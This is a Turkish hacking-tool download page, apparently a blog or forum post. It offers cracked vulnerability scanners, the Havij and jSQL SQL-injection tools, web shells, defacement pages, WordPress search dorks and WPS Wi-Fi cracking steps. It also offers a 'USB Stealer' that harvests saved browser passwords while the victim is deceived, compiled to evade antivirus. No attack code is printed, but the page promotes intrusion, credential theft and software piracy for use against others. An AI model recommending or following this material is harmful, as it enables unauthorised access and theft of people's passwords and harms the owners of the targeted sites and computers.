Önceki Hali:
Şimdiki Hali:
Dev Arşiv İndirmek İçin Tıkla
Dosya indirme limiti aşıldı. Dosyayı ancak Yandex.Disk'e kaydedebilirsiniz.Hatası verirse yukarıda giriş yap butonuna basarak giriş yapın isterseniz facebook yönlendirmesiyle giriş yapın..
Ethical hacking ve güvenlik eğitim seti, ethical hacking eğitimi, ethical hacking ve güvenlik eğitim seti türkçe indir, ethical hacking ve güvenlik 2 görsel eğitim seti, ethical hacking ve güvenlik eğitim seti 2
Ethical Hacking eğitim seti ücretli bir settir fullprogramindir ziyaretçilerine ücretsiz olarak sunduğumuz bu set ile hacking ve güvenlik ile ilgili merak ettiğiniz sorulara ve nasıl yapılıyor acaba sorusuna cevap bulabilirsiniz. Hacking olayı herkesin merakla takip ettiği konudur işte bu set ile bir çok konu görsel olarak anlatılmıştır. Eğitim seti mp4 formatındadır ve aşşağıda anlatılan konuların, konu başlıkları listelenmiştir iyi seyirler.
İndirmek İçin Tıkla
Acunetix Web Vulnerability Scanner Consultant Edition Full
Acunetix Web Vulnerability Scanner Consultant Edition indir Full 9.5.20140602 sitesi olalar için
önerilir SQL XSS Web uygulamaları vb tarayıp kontrol eder açıkları bulara size bunları raporlar
kısaca sitenizi sınayıp güvenlik açıklarını bildirir.
Boyut:25-mb
Sıkıştırma: Rar / Şifresiz
Tarama: Webroot. / Durum Temiz
İndirmek İçin Tıkla
Kod:
https://cloud.mail.ru/public/db4bd42d9987/webvulnscan9.rar
İçindekiler
Havij 1.15 Pro
Wordpress | Joomla Dork Yazar (Chez Dork)
Ux0r Arama Motoru
CMS Brute Force
3 Adet Shell (C99 | 3SPİ0N | THT SHELL)
7 Adet "Hacked" İndex Kodu
Arama Motoru İçin Wordpress Dorklar
("Comment on Hello world!")Buraya Kelime veya Cümle Yazın (Herhangi bir dilde)
("author/admin")Buraya Kelime veya Cümle Yazın (Herhangi bir dilde)
("uncategorized/hello-world")Buraya Kelime veya Cümle Yazın (Herhangi bir dilde)
("category/sin-categoria")Buraya Kelime veya Cümle Yazın (İspanyolca)
("uncategorized")Buraya Kelime veya Cümle Yazın (Herhangi bir dilde)
("non-classé")Buraya Kelime veya Cümle Yazın (Fransızca)
Arşivden Görüntü
İndirmek İçin Tıkla
Evren Atak
Evren Atak 1.3 Farkları : '
%100 Hatalardan Ayıklandı HATA VERMEZ '
%20 Hızlandırıldı !! '
%30 Pc kasması engellendi '
Tarama Bitince Kapanma Kapatıldı '
Google Banlangıcı Eklendi '
Hata Alanlar Bölümü Eklendi '
Seçenek Menüsü Full Tıklama İmkanı !!! '
Evren Atak İndirmek İçin Tıkla
Kurulumda .Net Framework 3.5 Kullanmanız Tavsiye Edilir.
Safe 3 Web Vuln Scanner Cracked
Arkadaşlar Demo sürümünde sadece Sql araması yapabilmekteydiniz fakat bu sürümde tamamını kapsayan bir tarama yapabilmektesiniz .Iyi kullanımlar.
İndirmek İçin Tıkla
Virüs Total İçin Tıkla
Usb Bellek İle Hedef Pc Bilgilerini Çekme
USB Stealer ile Webbrowser 'a Kayıtlı Olan Tüm Kullanıcı
Adlarını ve Şifrelerini Ele Geçirebilirsiniz.
Her zaman Bilgisayara Uazaktan Müdahale edecek değiliz elimize fırsat geçtiyse 1 dk dan daha kısa sürede USB miz yanımızda olduğu sürece Şifreleri ele geçirebiliriz.
Hatta Kurbanla yan yana otururken ve Kurban bizi izlerken o daha hiçbir şey anlamadan
Usb Stealerimizi Kullanabiliriz.
USB nizi Takıp ilk iş olarak Daha hızlı çalışması için USB Hızlandırmayı kullanalım diyerek
USB Hızlandır.exe 'yi Çalıştırırız
En Son Yazıcak olan "Hizlandirma islemi icin bir tusa basin / Program Sona Erecektir" yazısından sonra Herhangi Bir Tuşa Basarsanız USB 'nizde log.txt Şeklinde içerisinde
Şifrelerin olduğu Dosyamız Oluşacaktır.
<--- Desteklediği Tarayıcılar --->
Opera
Firefox
Google Chrome
İnternet Explorer
USB Stealer Bat Komutları ile Yazılmıştır Ancak .bat şeklindeki çıktı inandırıcı olmadığı için .exe olarak antivirüslere yakalanmayacak ve otomatik yönetici izni gerektirecek şekilde
özel olarak derlenmiştir.
İndirmek İçin Tıkla
Rar Şifresi : KorkusuzYazar
Virüs Total İçin Tıkla
jSQL Java Sql İnjection Programı / Havij Benzeri Program
jSQL Java Sql İnjection Programı / Havij Benzeri Program
jSQL Java İle yazılmış Sql Açıklı Siteleri Hacklememiz için Kodlanmış Bir Programdır.
Havij Bazen Sorunlar Çıkartabilmekte , Cracklerde Virüs Dahi Olabilmekte.
jSQL Sağlam Bir Program Havijin çözemediği DataBase'leri Çözdüğünü Biliyorum.
Benim Kendi Kullandığım Bir Program Ben Çok Memnunum Eminim Sizlerde Beğeneceksiniz.
<- ÖZELLİKLER ->
Sql İnjection
Admin Panel Bulucu
md5 , md2 , sha-1 , sha-256 , sha-384 , sha-512 , mysql hash'larını Brute Yöntemi ile Kesin Kırabilme
Base64 Encode - Decode
hex Encode - Decode
url Encode - Decode
html Encode - Decode
base64(zipped) Encode - Decode
hex(zipped) Encode - Decode
md5 hash
md2 hash
sha-1 hash
sha-256 hash
sha-384 hash
sha-512 hash
mysql hash
Oluşturabilme Özelliği
İndirmek İçin Tıkla
Kullana bilmeniz için java yüklü olaması lazım..
Windows'ta Wi-Fi Şifresi Kırmak ( Jumpstart + Dumpper )
Özellikle mobil teknolojinin gelişmesiyle kablosuz internet bağlantısı teknolojisin önemi şiddetle arttı. Bu yüzden etrafımızdaki kablosuz bağlantı noktaları aşırı bir şekilde arttı. Bu artıştan faydalanarak kendi internet bağlantısını sağlamak isteyenlerde bu artışla doğru orantılı şekilde yükseldi.
Windows'tan wifi şifresi bulmanın oldukça imkansız olduğu zamanlarda bu iş Linux'la, genelde de türevi Bactrack'le halledilirdi. Konsolda onlarca satır kod girmenizin gerektiği bu zamanlarda zaten etrafta yeterli sayıda modem yoktu. Lafı fazla uzatmadan gerekli işlemlere geçelim.
Öncelikle bağlanabileceğiniz modemin WPS için uygun olması lazım. Ayrıca %100 başarılı bir yöntem olmadığını da belirteyim. Bunun nedeni ise şifreyi bulurken en çok kullanılan şifrelerden oluşan bir listeden denemeler yapmasıdır.
Rar Şifresiz İndirmek İçin Tıkla
1-) Şimdi bu bağlantıdan dosyalarımızı indirmemiz lazım.
İndirmek İçin Tıkla
2-) İndirdikten sonra rar ile dosyamızı çıkartıyoruz. Aynen şu şekilde çıkarmış olmamız lazım.
RAR Şifresi : bilgisayardahisi.blogspot.com.tr
Alıntıdır.
Emeği geçen herkeze teşekkürler